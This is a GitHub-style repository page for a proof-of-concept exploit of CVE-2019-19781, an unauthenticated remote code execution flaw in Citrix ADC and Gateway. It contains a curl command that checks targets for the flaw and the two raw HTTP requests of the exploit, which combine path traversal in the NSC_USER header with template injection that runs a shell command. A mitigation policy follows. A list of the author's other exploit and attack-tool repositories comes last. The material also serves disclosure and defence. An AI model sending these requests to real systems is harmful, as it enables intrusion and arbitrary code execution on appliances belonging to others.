• Stars
    star
    157
  • Rank 232,921 (Top 5 %)
  • Language
    Python
  • Created over 4 years ago
  • Updated over 3 years ago

Reviews

There are no reviews yet. Be the first to send feedback to the community and the maintainers!

Repository Details

CVE-2019-19781 - Remote Code Execution on Citrix ADC Netscaler exploit

CVE-2019-19781

Remote Code Execution (RCE) in Citrix Application Delivery Controller and Citrix Gateway

A vulnerability has been identified in Citrix Application Delivery Controller (ADC) formerly known as NetScaler ADC and Citrix Gateway formerly known as NetScaler Gateway that, if exploited, could allow an unauthenticated attacker to perform arbitrary code execution.

EDIT: Indicator of Compromise Scanner for CVE-2019-19781 from Fireeye -> https://github.com/fireeye/ioc-scanner-CVE-2019-19781/

Products affected:

  • Citrix ADC and Citrix Gateway version 13.0 all supported builds
  • Citrix ADC and NetScaler Gateway version 12.1 all supported builds
  • Citrix ADC and NetScaler Gateway version 12.0 all supported builds
  • Citrix ADC and NetScaler Gateway version 11.1 all supported builds
  • Citrix NetScaler ADC and NetScaler Gateway version 10.5 all supported builds

image

Check if vulnerable

TARGET=your_ip
curl -vk โ€“path-as-is https://$TARGET/vpn/../vpns/ 2>&1 | grep โ€œYou donโ€™t have permission to access /vpns/โ€ >/dev/null && echo โ€œVULNERABLE: $TARGETโ€ || echo โ€œMITIGATED: $TARGETโ€

Vulnerable Perl script

POST /vpn/../vpns/portal/scripts/newbm.pl
POST /vpn/../vpns/portal/scripts/rmbm.pl
GET /vpn/../vpns/portal/scripts/picktheme.pl

Exploit

Only two requests are needed to exploit this vulnerability without any authentication !

First request:

POST /vpn/../vpns/portal/scripts/newbm.pl HTTP/1.1
Host: 3.81.59.87
NSC_USER: ../../../../netscaler/portal/templates/randomletter
NSC_NONCE: c
Connection: close
Content-Length: 103

url=http://exemple.com&title=[%t=template.new({'BLOCK'='print `uname -a`'})%][% t %]&desc=test&UI_inuse=RfWeb

Second request:

GET /vpns/portal/bonclay4.xml HTTP/1.1
Host: 3.81.59.87
NSC_USER: ../../../../netscaler/portal/templates/randomletter
NSC_NONCE: c
Connection: close

image

Detailed analysis (english):

Security advisory:

Patch (not a real patch)

enable ns feature responder
add responder action respondwith403 respondwith "\"HTTP/1.1 403 Forbidden\r\n\r\n\""
add responder policy ctx267027 "HTTP.REQ.URL.DECODE_USING_TEXT_MODE.CONTAINS(\"/vpns/\") && (!CLIENT.SSLVPN.IS_SSLVPN || HTTP.REQ.URL.DECODE_USING_TEXT_MODE.CONTAINS(\"/../\"))" respondwith403
bind responder global ctx267027 1 END -type REQ_OVERRIDE
save config 

More Repositories

1

BackupOperatorToDA

From an account member of the group Backup Operators to Domain Admin without RDP or WinRM on the Domain Controller
C++
378
star
2

Padding-oracle-attack

๐Ÿ”“ Padding oracle attack against PKCS7 ๐Ÿ”“
Python
316
star
3

Spring-Boot-Actuator-Exploit

Spring Boot Actuator (jolokia) XXE/RCE
Java
316
star
4

poodle-PoC

๐Ÿฉ Poodle (Padding Oracle On Downgraded Legacy Encryption) attack CVE-2014-3566 ๐Ÿฉ
Python
243
star
5

CVE-2019-0192

RCE on Apache Solr using deserialization of untrusted data via jmx.serviceUrl
Python
212
star
6

ByP-SOP

๐Ÿดโ€โ˜ ๏ธ Bypass Same Origin Policy with DNS-rebinding to retrieve local server files ๐Ÿดโ€โ˜ ๏ธ
HTML
194
star
7

CVE-2019-5418

CVE-2019-5418 - File Content Disclosure on Ruby on Rails
192
star
8

CVE-2019-7238

๐Ÿฑโ€๐Ÿ’ป Poc of CVE-2019-7238 - Nexus Repository Manager 3 Remote Code Execution ๐Ÿฑโ€๐Ÿ’ป
Python
151
star
9

Rails-doubletap-RCE

RCE on Rails 5.2.2 using a path traversal (CVE-2019-5418) and a deserialization of Ruby objects (CVE-2019-5420)
Ruby
134
star
10

discord-e2e-encryption

๐Ÿ”‘ Tampermonkey script that encrypt and decrypt your messages on Discord ๐Ÿ”‘
JavaScript
86
star
11

heartbleed-PoC

๐Ÿ’” Hearbleed exploit to retrieve sensitive information CVE-2014-0160 ๐Ÿ’”
Python
77
star
12

BEAST-PoC

๐Ÿ’ช Proof Of Concept of the BEAST attack against SSL/TLS CVE-2011-3389 ๐Ÿ’ช
Python
67
star
13

CVE-2018-17246

CVE-2018-17246 - Kibana LFI < 6.4.3 & 5.6.13
59
star
14

CVE-2019-7609

RCE on Kibana versions before 5.6.15 and 6.6.0 in the Timelion visualizer
51
star
15

CVE-2019-9580

CVE-2019-9580 - StackStorm: exploiting CORS misconfiguration (null origin) to gain RCE
HTML
32
star
16

CVE-2019-3799

CVE-2019-3799 - Spring Cloud Config Server: Directory Traversal < 2.1.2, 2.0.4, 1.4.6
32
star
17

astudiaeth

Master CSI
TeX
28
star
18

CRIME-poc

๐Ÿ”ช CRIME attack PoC : a compression oracle attacks CVE-2012-4929 ๐Ÿ”ช
Python
28
star
19

CVE-2018-16341

CVE-2018-16341 - Nuxeo Remote Code Execution without authentication using Server Side Template Injection
Python
25
star
20

ntlmrelayx-prettyloot

Convert the loot directory of ntlmrelayx into an enum4linux like output
Python
22
star
21

CVE-2018-19276

CVE-2018-19276 - OpenMRS Insecure Object Deserialization RCE
Python
17
star
22

HallOfFame-Root-me.org

๐Ÿ’€ Root-me Hall Of Fame dashboard ๐Ÿ’€
Python
15
star
23

DllInjectExec

๐Ÿ’‰ Dll injection for executable file ๐Ÿ’‰
C++
14
star
24

Slanger-RCE

RCE in Slanger using deserialization of Ruby objects
Python
12
star
25

CVE-2018-3760

Rails Asset Pipeline Directory Traversal Vulnerability
9
star
26

ropycat

Scripts that allow you to copy/past text into another Windows process to bypass Citrix copy/paste limitation
C#
9
star
27

CVE-2019-9978

CVE-2019-9978 - RCE on a Wordpress plugin: Social Warfare < 3.5.3
9
star
28

discourse-cookie-token-domain

๐Ÿช Allow to setup cookie token to authenticate user ๐Ÿช
Ruby
8
star
29

CVE-2018-11686

CVE-2018-11686 - FlexPaper PHP Publish Service RCE <= 2.3.6
Python
7
star
30

ShareP0wn

ShareP0wn
Python
7
star
31

YTC-ID

๐Ÿ“Œ Get the YouTube channel ID ! ๐Ÿ“Œ
HTML
5
star
32

DllInjectService

๐Ÿ’‰ Dll ready to be injected into a service ๐Ÿ’‰
C++
5
star
33

copper-jekyll-theme

Copper Jekyll theme - simple and useful
CSS
5
star
34

docker_dashboard

Python
4
star
35

impacket-cme

Python
2
star
36

swindle

Swindle is a project for YouTube Network
PHP
2
star
37

AChat-Reverse-TCP-Exploit

Tested on AChat 0.150 Beta 7 Windows 7/8/10 x86/x64
Python
2
star
38

Ipsum

Small app for YouTube Network. Get a free submit form for YouTube Channel who want join your network. With AngularJS
JavaScript
1
star
39

Pyrox

For Youtube Network with YouTube API V3 Public
PHP
1
star